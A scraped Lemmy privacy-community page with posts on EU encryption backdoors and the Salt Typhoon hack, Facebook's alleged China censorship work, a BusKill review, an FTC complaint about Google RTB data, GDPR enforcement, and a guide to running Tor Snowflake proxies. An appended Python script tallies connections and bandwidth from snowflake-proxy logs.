You give Mozilla all rights necessary to operate Firefox, including processing data as we describe in the Firefox Privacy Notice, as well as acting on your behalf to help you navigate the internet. When you upload or input information through Firefox, you hereby grant us a nonexclusive, royalty-free, worldwide license to use that information to [...]

submitted 2 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/30887912

Here is the report Security and Trust: An Unsolvable Digital Dilemma? (pdf)

Police authorities and governments are calling for digital backdoors for investigative purposes - and the EU Commission is listening. The Centre for European Policy (cep) warns against a weakening of digital encryption. The damage to cyber security, fundamental rights and trust in digital infrastructures would be enormous.

[...]

The debate has become explosive due to the current dispute between the USA and the UK. The British government is demanding that Apple provide a backdoor to the iCloud to allow investigating authorities access to encrypted data. Eckhardt sees parallels with the EU debate: "We must prevent the new security strategy from becoming a gateway for global surveillance." Technology companies such as Meta, WhatsApp and Signal are already under pressure to grant investigators access to encrypted messages.

"Once you install a backdoor, you lose control over who uses it," says Küsters. Chinese hackers were recently able to access sensitive data through a vulnerability in US telecommunications networks - a direct consequence of the infrastructure there. Instead, Küsters advocates a strategy of "security by design", i.e. designing systems securely from the outset, and the increased use of metadata analyses and platform cooperation as viable alternatives to mass surveillance.

[...]

Lessons from across the Atlantic?

A recent episode from the US provides an illustrative cautionary tale. For decades, some US law enforcement and intelligence agencies advocated “exceptional access” to encrypted communications, claiming that only criminals needed such robust privacy protections – echoing the current debate in the EU. But over the past months, a dramatic shift occurred following revelations that Chinese state-sponsored hackers had infiltrated major US telecommunications networks, gaining access to call metadata and possibly even live calls (the so-called “Salt Typhoon” hack).

Specifically, the Chinese hackers exploited systems that US telecom companies had built to comply with federal wiretapping laws such as the Communications Assistance for Law Enforcement Act (CALEA), which requires telecommunications firms to enable “lawful intercepts”. In theory, these built-in channels were supposed to only give law enforcement an exclusive window into suspect communications. In practice, however, they became a universal vulnerability that hostile actors could just as easily exploit.

Suddenly, the very government voices that once dismissed end-to-end encryption began recommending that citizens use encrypted messaging apps to maintain their security.

**What can we learn from this?**

While governments often push for greater surveillance capabilities, the real and current threat of state-sponsored cyber-espionage demonstrates the indispensable value of strong encryption. As the Electronic Frontier Foundation has noted, Salt Typhoon shows once more that there is no such thing as a backdoor that only the “good guys” can use.

If the mechanism exists, a malicious party will eventually find it and weaponise it. The lesson for Europe is clear: undermining encryption to aid investigations may prove short-sighted if it also exposes citizens – and state institutions – to hostile foreign interference. Is this really what we want to do in an increasingly challenging geopolitical environment? The debate about ensuring lawful and effective access to data in the digital age will remain one of the most pressing challenges, so we need to ask whether there are alternative, viable models.

[...]

20
11
submitted 2 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/30804814

A former senior Facebook executive has told the BBC how the social media giant worked "hand in glove" with the Chinese government on potential ways of allowing Beijing to censor and control content in China.

Sarah Wynn-Williams - a former global public policy director - says in return for gaining access to the Chinese market of hundreds of millions of users, Facebook's founder, Mark Zuckerberg, considered agreeing to hiding posts that were going viral, until they could be checked by the Chinese authorities.

Ms Wynn-Williams - who makes the claims in a new book - has also filed a whistleblower complaint with the US markets regulator, the Securities and Exchange Commission (SEC), alleging Meta misled investors. The BBC has reviewed the complaint.

Facebook's parent company Meta, says Ms Wynn-Williams had her employment terminated in 2017 "for poor performance".

It is "no secret we were once interested" in operating services in China, it adds. "We ultimately opted not to go through with the ideas we'd explored."

[...]

Ms Wynn-Williams says her allegations about the company's close relationship with China provide an insight into Facebook's decision-making at the time.

[...]

Ms Wynn-Williams claims that in the mid-2010s, as part of its negotiations with the Chinese government, Facebook considered allowing it future access to Chinese citizens' user data.

"He was working hand in glove with the Chinese Communist Party, building a censorship tool… basically working to develop sort of the antithesis of many of the principles that underpin Facebook," she told the BBC.

Ms Wynn-Williams says governments frequently asked for explanations of how aspects of Facebook's software worked, but were told it was proprietary information.

"But when it came to the Chinese, the curtain was pulled back," she says.

"Engineers were brought out. They were walked through every aspect, and Facebook was making sure these Chinese officials were upskilled enough that they could not only learn about these products, but then test Facebook on the censorship version of these products that they were building."

[...]

In her SEC complaint, Ms Wynn-Williams also alleges Mr Zuckerberg and other Meta executives had made "misleading statements… in response to Congressional inquiries" about China.

One answer given by Mr Zuckerberg to Congress in 2018 said Facebook was "not in a position to know exactly how the [Chinese] government would seek to apply its laws and regulations on content".

[...]

21
-1
submitted 3 months ago by [email protected] to c/[email protected]

We're very happy to share Techlore's video review of the BusKill Kill Cord.

BusKill Techlore Review
Can't see video above? Watch it on PeerTube at neat.tube or on YouTube at youtu.be/Zns0xObbOPM

Disclaimer: We gave Techlore a free BusKill Kit for review; we did not pay them nor restrict their impartiality and freedom to publish an independent review. For more information, please see Techlore's Review Unit Protocols policy. We did require them to make the video open-source as a condition of receiving this free review unit. The above video is licensed CC BY-SA; you are free to redistribute it. If you are a video producer and would like a free BusKill Kit for review, please contact us.

To see the full discussion about this video on the Techlore forums, see:

Support BusKill

We're looking forward to continuing to improve the BusKill software and looking for other avenues to distribute our hardware BusKill cable to make it more accessible this year.

If you want to help, please consider purchasing a BusKill cable for yourself or a loved one. It helps us fund further development, and you get your own BusKill cable to keep you or your loved ones safe.

Buy a BusKill Cable
https://buskill.in/buy

You can also buy a BusKill cable with bitcoin, monero, and other altcoins from our BusKill Store's .onion site.


Stay safe,
The BusKill Team
https://www.buskill.in/
http://www.buskillvampfih2iucxhit3qp36i2zzql3u6pmkeafvlxs3tlmot5yad.onion/

22
71
submitted 3 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/30014783

U.S. Federal Trade Commission urged to investigate Google’s RTB data in first ever complaint under new national security data law.

Google sends enormous quantities of sensitive data about Americans to China and other foreign adversaries, according to evidence in a major complaint filed today at the FTC by Enforce and EPIC. This is the first ever complaint under the new Protecting Americans’ Data from Foreign Adversaries Act.

The complaint (open pdf) targets a major part of Google’s business: Google’s Real-Time Bidding (RTB) system dominates online advertising, and operates on 33.7 million websites, 92% of Android apps, and 77% of iOS apps. Much of Google’s $237.9 billion advertising revenue is RTB.

Today’s complaint reveals that Google has known for at least a decade that its RTB technology broadcasts sensitive data without any security, according to internal Google discussions highlighted in today’s complaint.

The complaint cites internal Google communications showing that Google CEO, Sundar Pichai, rejected or failed to act upon internal calls (example) to reform the company’s dangerous RTB system in 2021. Instead, Google continued to expose sensitive American defense and industry personnel, and their institutions, to blackmail and compromise, in addition to causing grave privacy harm to consumers. Even Google’s so-called “non personalized” data contains dangerous data.

[...]

23
9
submitted 3 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/30014356

The General Data Protection Regulation (GDPR) was designed to put people’s rights at the centre of the digital economy, ensuring strong safeguards against data exploitation and corporate or state overreach. However, nearly six years after its enforcement, the reality falls short of the promise. Large technology companies have repeatedly delayed and obstructed procedures, while inconsistencies between (and other practices of) Data Protection Authorities (DPAs) have left individuals without effective redress.

The GDPR Procedural Regulation offers a rare opportunity to fix systemic weaknesses by streamlining cross-border enforcement, reducing delays, and ensuring consistency in cross-border cases. If done right, it could restore trust in the GDPR and reaffirm the EU’s leadership in protecting fundamental rights in the digital age. But if weakened by loopholes and inefficiencies, it risks entrenching existing problems and setting a dangerous precedent for digital rights enforcement.

Civil Society’s Call to Action

The letter (opens pdf) —signed by a broad coalition of human rights organisations—urges negotiators to ensure that the Regulation upholds the GDPR’s original vision of strong, meaningful enforcement. Key concerns include:

  • Delays and procedural asymmetries: Some DPAs, particularly in jurisdictions where major tech companies are headquartered, have systematically delayed decisions, leaving individuals without redress while companies continue to profit from unlawful practices.
  • Unpaid fines and ineffective deterrence: Despite high-profile GDPR fines, enforcement remains inconsistent, with some penalties going unpaid for years, eroding the credibility of the framework.
  • Loopholes in early trilogue drafts: Provisions under discussion could inadvertently introduce new complexities rather than resolving existing inefficiencies, creating further barriers to enforcement.

[...]

24
11
submitted 3 months ago by [email protected] to c/[email protected]
25
10
submitted 4 months ago* (last edited 4 months ago) by [email protected] to c/[email protected]

cross-posted from: https://lemmy.dbzer0.com/post/36880616

Help Combat Internet Censorship by Running a Snowflake Proxy (Browser or Android)

Internet censorship remains a critical threat to free expression and access to information worldwide. In regions like Iran, Russia, and Belarus, journalists, activists, and ordinary citizens face severe restrictions when trying to communicate or access uncensored news. You can support their efforts by operating a Snowflake proxy—a simple, low-impact way to contribute to a freer internet. No technical expertise is required. Here’s how it works:


What Is Snowflake?

Snowflake is a privacy tool integrated with the Tor network. By running a Snowflake proxy, you temporarily route internet traffic for users in censored regions, allowing them to bypass government or institutional blocks. Unlike traditional Tor relays, Snowflake requires minimal bandwidth, no configuration, and no ongoing maintenance. Your device acts as a temporary bridge, not a permanent node, ensuring both safety and ease of use.


Is This Safe for Me?

Short answer: Yes.

Long answer: probably. Here is why:

  • Your IP address is not exposed to the websites they access. So, you don't have to worry about what they are doing either. You are not an exit node.
  • No activity logs. Snowflake cannot monitor or record what users do through your connection. The only stored information is how many people have connected to your bridge. Check docs for further info on this.
  • Low resource usage. The data consumed is comparable to background app activity—far less than streaming video or music.
  • No direct access to your system.
  • No storage of sensitive data. Snowflake proxies do not store any sensitive data, such as IP addresses or browsing history, on your system.
  • Encrypted communication. All communication between the Snowflake proxy and the Tor network is encrypted, making it difficult for attackers to intercept or manipulate data.

You are not hosting a VPN or a full Tor relay. Your role is limited to facilitating encrypted connections, similar to relaying a sealed envelope.

Your IP address is exposed to the user (in a P2P-like connection). Be mindful that your ISP could also potentially see the WebRTC traffic and the connections being made to it (but not the contents), so be mindful of your threat model.

For most users, it is generally safe to run Snowflake proxies. Theoretically, your ISP will be able to know that there are connections being made there, but to them it will look like you're calling someone on, say, Zoom.

Historically, as far as we know, there haven't been any cases of people getting in legal trouble for running entry relays, middle relays, or bridges. There have been a few cases of people running exit nodes and getting in trouble with law enforcement agencies, but none of them have been arrested or prosecuted as far as I know. If you are aware of any cases, let me know so I can update this post.

Do not hesitate to check Snowflake's official documentation for further reference and to make informed decisions.


How to Set Up a Snowflake Proxy

Option 1: Browser Extension (Brave, Firefox, or Chrome)

  1. Install the Snowflake extension.
  2. Click the Snowflake icon in your browser toolbar and toggle "Enable Snowflake."
  3. Keep the browser open. That’s all.

Note: Brave users can enable Snowflake directly in settings. Navigate to brave://settings/privacy and activate the option under "Privacy and security."


Option 2: Android Devices via Orbot

  1. Download Orbot (Tor’s official Android app).
  2. Open the app’s menu, select "Snowflake Proxy," and toggle it on.
  3. For continuous operation, keep your device charged and connected to Wi-Fi.

Your device will now contribute as a proxy whenever the app is active.


Addressing Common Concerns

  • Battery drain: Negligible. Snowflake consumes fewer resources than typical social media or messaging apps.
  • Data usage: Most users report under 1 GB per month. Adjust data limits in Orbot’s settings or restrict operation to Wi-Fi if necessary.

Why Your Participation Matters

Censorship mechanisms grow more sophisticated every year, but tools like Snowflake empower ordinary users to counteract them. Each proxy strengthens the Tor network’s resilience, making it harder for authoritarian regimes to isolate their populations. By donating a small amount of bandwidth, you provide someone with a critical connection to uncensored information, education, and global dialogue.

Recent surges in demand—particularly in Russia—highlight the urgent need for more proxies. Your contribution, however small, has an impact.

By participating, you become part of a global effort to defend digital rights and counter censorship. Please, also be mindful of your threat model and understand the potential risks (though very little for most people). Check Snowflake's official documentation for further reference and don't make any decisions based on this post before taking your time to read through it.

Please share this post to raise awareness. The more proxies, the stronger the network.

– llama
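An added example, not part of llama's post above nor of the Tor Project's own code: the post notes that the only thing a proxy records is how many people connected, and that data usage is usually under 1 GB per month. If you run the standalone snowflake-proxy binary instead of the browser extension or Orbot, you can check both claims against your own log. The hourly summary-line format matched by the regex below is an assumption about the standalone proxy's periodic log message (adjust the pattern if your build prints it differently), and the sample lines are constructed, not captured from a real proxy.

```python
"""Tally connections and relayed bytes from snowflake-proxy summary log lines.

Added example. The summary-line format is an ASSUMPTION about the standalone
snowflake-proxy's periodic log message; the sample log below is constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample log (not real proxy output). One unrelated line is
# included to show it is skipped rather than mis-parsed.
SAMPLE_LOG = """\
2025/01/10 00:00:00 In the last 1h0m0s, there were 3 completed connections. Traffic Relayed ↓ 12 MB, ↑ 4 MB.
2025/01/10 01:00:00 In the last 1h0m0s, there were 0 completed connections. Traffic Relayed ↓ 0 B, ↑ 0 B.
2025/01/10 02:00:00 In the last 1h0m0s, there were 7 completed connections. Traffic Relayed ↓ 150 MB, ↑ 300 KB.
2025/01/10 02:00:01 NAT type: unrestricted
"""

# Binary units, as the proxy's human-readable sizes are assumed to be.
_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}

_SUMMARY_RE = re.compile(
    r"there were (?P<conns>\d+) completed connections\. "
    r"Traffic Relayed ↓ (?P<down>[\d.]+) (?P<down_u>[KMG]?B), "
    r"↑ (?P<up>[\d.]+) (?P<up_u>[KMG]?B)\."
)


@dataclass
class ProxyStats:
    hours: int = 0          # number of hourly summary lines seen
    connections: int = 0    # completed client connections
    down_bytes: int = 0
    up_bytes: int = 0

    @property
    def total_bytes(self) -> int:
        return self.down_bytes + self.up_bytes

    def projected_monthly_gib(self) -> float:
        """Extrapolate the observed hourly rate to a 30-day month."""
        if self.hours == 0:
            return 0.0
        return self.total_bytes / self.hours * 24 * 30 / 1024 ** 3


def _to_bytes(value: str, unit: str) -> int:
    return int(float(value) * _UNITS[unit])


def summarise(log_text: str) -> ProxyStats:
    """Parse every summary line in log_text; non-matching lines are ignored."""
    stats = ProxyStats()
    for line in log_text.splitlines():
        m = _SUMMARY_RE.search(line)
        if not m:
            continue
        stats.hours += 1
        stats.connections += int(m["conns"])
        stats.down_bytes += _to_bytes(m["down"], m["down_u"])
        stats.up_bytes += _to_bytes(m["up"], m["up_u"])
    return stats


if __name__ == "__main__":
    s = summarise(SAMPLE_LOG)
    print(f"{s.hours} h observed, {s.connections} connections, "
          f"{s.total_bytes / 1024 ** 2:.1f} MiB relayed, "
          f"~{s.projected_monthly_gib():.1f} GiB/month at this rate")
```

Point the script at your real log (for example, the journal of the proxy's service unit) to see whether your monthly volume matches the figure quoted in the post; a short busy window will project high, so let it run for a few days before drawing conclusions.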
